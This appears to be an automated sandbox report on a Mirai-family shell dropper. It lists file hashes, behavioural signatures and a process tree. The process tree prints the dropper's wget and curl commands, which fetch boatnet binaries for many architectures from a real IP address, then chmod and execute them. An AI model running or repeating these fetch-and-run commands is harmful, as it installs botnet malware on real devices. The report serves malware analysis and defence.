Analysis

  • max time kernel
    95s
  • max time network
    143s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    17-12-2024 11:18

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    d7aac5b39f096043750096172ee9a84f

  • SHA1

    fde809f81c26db59c148255c0b60176c8971bc0c

  • SHA256

    2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5

  • SHA512

    77c79dcb7c89e16cfe5d3712adf37173249b6066673ff20c2a2b6c90ebe2eb5ac5c295a250b6b9fc0596ff0872ecc15d4dec8852a515c0826436426dd5f1efff

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Writes file to system bin folder 2 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads runtime system information 32 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 19 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:705
    • /usr/bin/wget
      wget http://147.45.124.54/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:708
    • /usr/bin/curl
      curl -O http://147.45.124.54/hiddenbin/boatnet.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:729
    • /bin/cat
      cat boatnet.x86
      2⤵
        PID:734
      • /bin/chmod
        chmod +x boatnet.x86 ohshit.sh systemd-private-4c5662926c9c444eb60597c66036d875-systemd-timedated.service-hzF33e WTF
        2⤵
        • File and Directory Permissions Modification
        PID:735
      • /tmp/WTF
        ./WTF
        2⤵
        • Executes dropped EXE
        PID:736
      • /usr/bin/wget
        wget http://147.45.124.54/hiddenbin/boatnet.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:738
      • /usr/bin/curl
        curl -O http://147.45.124.54/hiddenbin/boatnet.mips
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:739
      • /bin/cat
        cat boatnet.mips
        2⤵
        • System Network Configuration Discovery
        PID:740
      • /bin/chmod
        chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-4c5662926c9c444eb60597c66036d875-systemd-timedated.service-hzF33e WTF
        2⤵
        • File and Directory Permissions Modification
        PID:741
      • /tmp/WTF
        ./WTF
        2⤵
        • Executes dropped EXE
        PID:742
      • /usr/bin/wget
        wget http://147.45.124.54/hiddenbin/boatnet.arc
        2⤵
        • Writes file to tmp directory
        PID:744
      • /usr/bin/curl
        curl -O http://147.45.124.54/hiddenbin/boatnet.arc
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:747
      • /bin/cat
        cat boatnet.arc
        2⤵
          PID:778
        • /bin/chmod
          chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-4c5662926c9c444eb60597c66036d875-systemd-timedated.service-hzF33e WTF
          2⤵
          • File and Directory Permissions Modification
          PID:780
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          PID:781
        • /usr/bin/wget
          wget http://147.45.124.54/hiddenbin/boatnet.i468
          2⤵
            PID:785
          • /usr/bin/curl
            curl -O http://147.45.124.54/hiddenbin/boatnet.i468
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:795
          • /bin/cat
            cat boatnet.i468
            2⤵
              PID:797
            • /bin/chmod
              chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4c5662926c9c444eb60597c66036d875-systemd-timedated.service-hzF33e WTF
              2⤵
              • File and Directory Permissions Modification
              PID:798
            • /tmp/WTF
              ./WTF
              2⤵
              • Executes dropped EXE
              PID:799
            • /usr/bin/wget
              wget http://147.45.124.54/hiddenbin/boatnet.i686
              2⤵
                PID:800
              • /usr/bin/curl
                curl -O http://147.45.124.54/hiddenbin/boatnet.i686
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:801
              • /bin/cat
                cat boatnet.i686
                2⤵
                  PID:802
                • /bin/chmod
                  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4c5662926c9c444eb60597c66036d875-systemd-timedated.service-hzF33e WTF
                  2⤵
                  • File and Directory Permissions Modification
                  PID:803
                • /tmp/WTF
                  ./WTF
                  2⤵
                  • Executes dropped EXE
                  PID:804
                • /usr/bin/wget
                  wget http://147.45.124.54/hiddenbin/boatnet.x86_64
                  2⤵
                    PID:805
                  • /usr/bin/curl
                    curl -O http://147.45.124.54/hiddenbin/boatnet.x86_64
                    2⤵
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:812
                  • /bin/cat
                    cat boatnet.x86_64
                    2⤵
                      PID:822
                    • /bin/chmod
                      chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4c5662926c9c444eb60597c66036d875-systemd-timedated.service-hzF33e WTF
                      2⤵
                      • File and Directory Permissions Modification
                      PID:823
                    • /tmp/WTF
                      ./WTF
                      2⤵
                      • Executes dropped EXE
                      PID:825
                    • /usr/bin/wget
                      wget http://147.45.124.54/hiddenbin/boatnet.mpsl
                      2⤵
                      • Writes file to tmp directory
                      PID:826
                    • /usr/bin/curl
                      curl -O http://147.45.124.54/hiddenbin/boatnet.mpsl
                      2⤵
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:837
                    • /bin/cat
                      cat boatnet.mpsl
                      2⤵
                        PID:842
                      • /bin/chmod
                        chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4c5662926c9c444eb60597c66036d875-systemd-timedated.service-hzF33e WTF
                        2⤵
                        • File and Directory Permissions Modification
                        PID:843
                      • /tmp/WTF
                        ./WTF
                        2⤵
                        • Executes dropped EXE
                        • Modifies Watchdog functionality
                        • Writes file to system bin folder
                        • Reads runtime system information
                        PID:844
                      • /usr/bin/wget
                        wget http://147.45.124.54/hiddenbin/boatnet.arm
                        2⤵
                        • Writes file to tmp directory
                        PID:848
                      • /usr/bin/curl
                        curl -O http://147.45.124.54/hiddenbin/boatnet.arm
                        2⤵
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:849
                      • /bin/cat
                        cat boatnet.arm
                        2⤵
                          PID:856
                        • /bin/chmod
                          chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
                          2⤵
                          • File and Directory Permissions Modification
                          PID:857
                        • /tmp/WTF
                          ./WTF
                          2⤵
                          • Executes dropped EXE
                          PID:858
                        • /usr/bin/wget
                          wget http://147.45.124.54/hiddenbin/boatnet.arm5
                          2⤵
                          • Writes file to tmp directory
                          PID:860
                        • /usr/bin/curl
                          curl -O http://147.45.124.54/hiddenbin/boatnet.arm5
                          2⤵
                          • Reads runtime system information
                          • Writes file to tmp directory
                          PID:861
                        • /bin/cat
                          cat boatnet.arm5
                          2⤵
                            PID:862
                          • /bin/chmod
                            chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
                            2⤵
                            • File and Directory Permissions Modification
                            PID:863
                          • /tmp/WTF
                            ./WTF
                            2⤵
                            • Executes dropped EXE
                            PID:864
                          • /usr/bin/wget
                            wget http://147.45.124.54/hiddenbin/boatnet.arm6
                            2⤵
                            • Writes file to tmp directory
                            PID:866
                          • /usr/bin/curl
                            curl -O http://147.45.124.54/hiddenbin/boatnet.arm6
                            2⤵
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:867
                          • /bin/cat
                            cat boatnet.arm6
                            2⤵
                              PID:868
                            • /bin/chmod
                              chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
                              2⤵
                              • File and Directory Permissions Modification
                              PID:869
                            • /tmp/WTF
                              ./WTF
                              2⤵
                              • Executes dropped EXE
                              PID:870
                            • /usr/bin/wget
                              wget http://147.45.124.54/hiddenbin/boatnet.arm7
                              2⤵
                              • Writes file to tmp directory
                              PID:872

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • /tmp/WTF

                            Filesize

                            23KB

                            MD5

                            3bdca38ef6a4b0c3aba6c2aeb9adf306

                            SHA1

                            6644331553bc4b14d5409e43ca833a246a48f942

                            SHA256

                            072a76e22e93f371f6110b43b1f270a4f5c2e9dbdc919315ffcd81c5979b202c

                            SHA512

                            1afafe5654a371e5d472437b26b5a496444f4a057e913e146d01c6c81e4b8c7806cd3bf6ffe51dfffd760a7ec73f8449675d01322ef9a917f233f1a3bfc60863

                          • /tmp/WTF

                            Filesize

                            105KB

                            MD5

                            1fd8e43cbe5b81848f9cfc60c09d1340

                            SHA1

                            63ab77fb7378f0d6e312f26e844002e80965a494

                            SHA256

                            317b00ed2023e148d3e740ffc212f5c4adbfce5abe037f6fa1e606dec067d1fa

                            SHA512

                            322a26c7fb80b858a19a1dfffac7b5a759e33f60c125761750a6bbe22590be817b8194194780a2e3542c05634900c8bb2c3cfbafbdd6e94ddc133e5177ffb9c1

                          • /tmp/WTF

                            Filesize

                            220B

                            MD5

                            f1c24d9fa40a047ae22d2d3ae7dfeac9

                            SHA1

                            750274b02d5f5b00026a4f55b020f4285c693533

                            SHA256

                            219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc

                            SHA512

                            36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

                          • /tmp/WTF

                            Filesize

                            220B

                            MD5

                            a8f502a6fb3b7b940e922c951d9e493a

                            SHA1

                            fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf

                            SHA256

                            748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec

                            SHA512

                            e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

                          • /tmp/WTF

                            Filesize

                            26KB

                            MD5

                            8f5404967b32e6ee636ffe931b401cf3

                            SHA1

                            856eebf0d696bc1d82535ce6c42510d2ab441dde

                            SHA256

                            49d4618d1fda32e2d3ed214a581b4c2ada51de33797471345b51da252f9462be

                            SHA512

                            1a52287b2215042fba728a3556be7f3f60e47f6ac2ad99cf9f7f85b8813e22813236f0e91879554a8ae6547d2e59d6a2800c3b3fe613448cb37d14955bf7d2d6

                          • /tmp/boatnet.x86

                            Filesize

                            20KB

                            MD5

                            9acf9fc63b01f4a7a5b33881073ff6a6

                            SHA1

                            cf5be79ccc477ca582c8aee42898442f8089b886

                            SHA256

                            0a21cbd563070ce0b39665b70de81e88f4680648335e9c6cd13963e8846e7ea9

                            SHA512

                            1dd2bd462850bdd10a2d95214d16dd358131838862a119b47ba6d70a0c894284efbf7294e24c79b0032aba41e09b8e84c372bdae073d6339e269187b8794eae5